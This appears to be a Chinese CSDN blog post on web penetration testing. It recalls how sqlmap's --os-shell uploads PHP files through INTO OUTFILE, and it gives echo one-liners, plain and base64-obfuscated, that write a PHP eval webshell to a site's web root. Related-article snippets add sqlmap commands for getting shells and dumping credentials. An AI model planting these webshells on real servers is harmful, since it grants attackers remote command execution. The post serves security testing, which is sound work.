sqlmap --os-shell php文件密码在哪解决方法

已于 2022-05-26 11:26:06 修改
阅读量668 收藏 1
点赞数
分类专栏: 漏洞复现 杂七杂八 渗透测试 文章标签: web安全 安全漏洞 网络安全
于 2022-05-26 11:25:44 首次发布
如需转载请于主页联系,得到允许方可实施
本文链接:https://blog.csdn.net/m0_60988110/article/details/124978485
版权

0x00 开篇

今日做s-cms网站,发现该站可以使用os-shell获得权限,因为--os-shell命令执行条件较为苛刻,平时不常见,突然一时间想不起sqlmap自动写入的php文件密码是什么。

由于犯了先入为主错误,认为sqlmap生成的webshell就得先得知道密码才能连接,于是他喵的钻进牛角尖没出来........过了好一会才发现是闹个乌龙。

0x01 echo写webshell

忘记php密码,自己echo写webshell,但需要知道该网站路径,以及要求路径要有写入权限。

echo '<?php eval($_POST['1']);?>' >/路径/1.php
假如因关键字符被转义、屏蔽导致失败,也可以base64加密
echo 'PD9waHAgZXZhbCgkX1BPU1RbJzEnXSk7Pz4=' | base64 -d >/路径/1.php

蚁剑连接即可成功连接

0x02 sqlmap自动生成webshell

--os-shell命令基本原理是利用into outfile函数上传tmpuhjme.php文件,把它写入到网站目录下。下面可以结合上传大马,再次进行深入利用。

tmpuhjme.php上传成功后,会再上传一个命令执行文件-tmpbblnp.php。至于文件名不用纠结,个人没记错的话,sqlmap文件名有个生成算法,前三位不变以tmp开头不变,后五位按序随机生成。

 0x03 总结

考虑问题一定不要先入为主,主观判断只会把简单事情变复杂化。

身高两米不到
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmapshell命令及步骤
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-12 2463
写一篇利用工具sqlmapshell的文章,网上已经有很多类似的文章了,感觉不是很详细,也是自己做个笔记再重温一遍sqlmapshell命令及步骤吧 sqlmap.py -u "http://192.168.3.50/2sqli-labs/Less-1/?id=1" --os-shell输入完语句之后首先会让你选择脚本类型,我这里是php的 接下来回车一下,又会出现4个选项(让你指定目录)我这个选择自定义目录,然后回车接下来输入网站的根路径会自动生成一个上传文件的地方成功写入2个shell,一个用来执行
WEB安全SQLMAP获取后台账号密码
yijinbaiyi的博客
01-21 1601
SQLMAP获取后台账号密码 一. SQLmap SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。 二. 常见注入类型 ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入 ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延迟语句...
DVWA(linux下)利用sqlmap进行--os-shell注入不能成功的错误处理
Spwpun的博客
11-16 9636
报错情况: 我在自己的kali linux虚拟机下面安装了DVWA渗透测试系统以便自己进行渗透测试的基础学习,在进行sqli(sql injection)-low级别的测试的时候,利用sqlmap进行注入,加上–os-shell参数获取shell(即系统下的命令行,windows下的cmd,linux下的terminal),发现不能执行。 最后总是报这样的错,unable to uploa...
解决php调用shell sudo输入免密码的问题
MissZhou要努力
01-11 1965
问题背景: 想在oj上加一个重启判题服务的按钮调用shell而已 1.使用su root进入root账户 修改/etc/sudoers权限 777 %sudo ALL=(ALL:ALL) ALL改为 %sudo ALL=(ALL:ALL) NOPASSWD:ALL %表示组 即sudo组的都可以免密码使用sudo指令(其实有点危险啊) 2.usermod -G sudo
sqlmap,扫描网站数据库并得到用户名及密码
专注前端技术,包括Web端、移动端、小程序、APP
02-04 9906
接着上篇文章,你已经对sqlmap有了了解。那么我们今天就进一步了解sqlmap,使用sqlmap对一个网站解剖分析! SqlMap的程序允许检查网站的SQL注入漏洞,XSS漏洞的存在,并且可以还利用SQL注入。支持多种SQL注入类型和多种数据库。 我们可以使用sqlmap检查网站中是否存在漏洞。 如果该站点容易受到SQL注入的攻击,则骇客可以进行以下攻击: 从数据库接收信息,包括转储(整个)数...
sqlmap注入后,获取到的数据库、表很多,如何快速找到账号和密码的位置
看不尽的尘埃——博客
02-07 7321
-D 数据库–-search -C admin,password  
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
sqlmap-master
最新发布
01-04
在"sqlmap-master"这个压缩包中,我们可能看到的文件结构通常包括源代码文件、配置文件、文档、示例用法等。源代码文件SQLMap的核心部分,由Python编写,可能包含多个模块,如HTTP请求模块、SQL注入检测模块、...
sqlmap-1.4.5.zip
05-22
sqlmap-1.4.5,亲爱的朋友,SQLMAP是自动化的SQL注入和数据库接管工具,是开源的渗透测试工具,它能自动检测和利用SQL注入漏洞并接管数据库服务器。它配备了强大的检测引擎、最终渗透测试器的许多利基特性和广泛的...
sqlmap-gtk:使用PyGObject(gtk + 3)的sqlmap GUI
05-24
sqlmap-gtk sqlmap GUI,使用PyGObject(gtk + 3) 支持linux,在Mint 20上测试,kali 2020.4 上的 ,需要改进。 sqlmap具有python3的端口。 请不要再使用python2了。截屏如何先决条件python3.6 +,GTK + 3.20以上...
过云锁php木马,绕过waf的另类木马文件攻击方法
weixin_34260080的博客
03-12 450
很久没写文章了,继上次发先文章到今天已经很久了;很久没写文章了,继上次发先文章到今天已经很久了;今天突发异想;因为之前打了西湖论剑,遇到了宝塔的waf,最后也是过去了,便觉得另类的攻击方法值得写篇文章分享下;首先我打算分享几种。一:动态调用​首先,一些waf会对文件内容进行检索,如果发现有什么危险的函数,或者有什么危害的逻辑,都会进行拦击,所以我们不能写入一些危险的函数,否则就会被ban掉,其实在...
sqlmap的--os-shell
qq_54037445的博客
01-15 2555
(1)、询问你是否需要sqlmap去尝试网站的绝对路径,一般是尝试一些常用的绝对路径,如:'C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/'等,我们使用的是靶场,他爆破不到,所以选择n;利用into outfile 向指定的网站的物理路径写入一个木马文件,该木马文件的编写语言为该网站的编程语言,这个木马文件的主要作用是可以上传一个用于执行命令的木马,并且对用于执行命令的木马进行赋权,使其具有读写执行权限;(2)、已知网站的物理路径;
SQLMap使用教程:从入门到入狱详细指南
qq_61553520的博客
04-14 6279
本文会主要介绍SQLMap的使用,包括常用的参数,常用的语句,以及常用的功能。
Linux MySQL密码忘记或者找不到初始化密码解决方法
Lie_Jiu的博客
02-24 1万+
Linux MySQL密码忘记或者找不到初始化密码解决方法 在使用Linux时每次下载完数据库,进入数据库时查找不到初始密码,有时候用户名密码一多也容易忘记,记录一种方式解决这个问题,亲测有效;
sqlmap中的--sql-shell
qq_45751902的博客
10-25 7950
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出。2、secure_file_priv 的值非NULL或包含了导出的绝对路径。outfile 和 dumpfile的路径不支持hex,必须有引号包裹。4、mysql连接用户有FILE权限/ROOT用户或ROOT权限。Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。3、mysql服务有对网站可访问路径的写权限。5、GPC关闭//未对闭合用的引号转义。1、网站可访问路径的绝对路径。
利用sqlmap注入获取网址管理员账号密码
WINDY_PACE的博客
04-21 6540
sqlmap 靶场的攻击注入利用。
sqlmap (--os-shell)的使用
热门推荐
千寻的博客
11-04 9万+
第一步 搭建存在sql注入的网站 第二步 扫描注入点 python sqlmap.py -u "http://192.168.232.129/cms/show.php?id=33" --os-shell 第三步 选择网站的语言 第四步 输入网站的角度路径 第五步 查看权限
注入神器-----SqlMap的使用
weixin_54227009的博客
05-28 1362
sqlmap GET参数: -u 网址 --dbs:获取注入点的所有数据库 -D:指定数据库 --tables:获取指定的表 -T:表名 --columns:获取表的指定字段 -C:获取指定字段 --dump:把数据打印出来 POST注入: 先抓包, 注入点的位置打个*号 然后保存为txt文档 -r 指定的文档 --dbs:获取注入点的所有数据库 --level=3,注入级别默认为1,为三的话注入能力加强一点 --current-db:获取当前数据库 sqlmap获取sh...
SQLmap注入获取Webshell常见命令
p_utao的博客
01-22 1077
sqlmap获取shell常见命令 –is-dba:判断是否有dba权限 –os-shell:获取系统交互命令 –sql-shell:获取数据库交互命令 –password:枚举数据库管理系统用户密码哈希值 参考:https://www.cnblogs.com/fzblog/p/13800604.html ...
sqlmap --os-shell上传shell
04-12
b的意思是运行命令的前缀,sqlmap是一款自动化SQL注入工具。--os-shell表示运行命令并打开操作系统的shell。上述命令的含义是在SQL注入后上传一个shell并打开操作系统的shell,以便执行系统命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值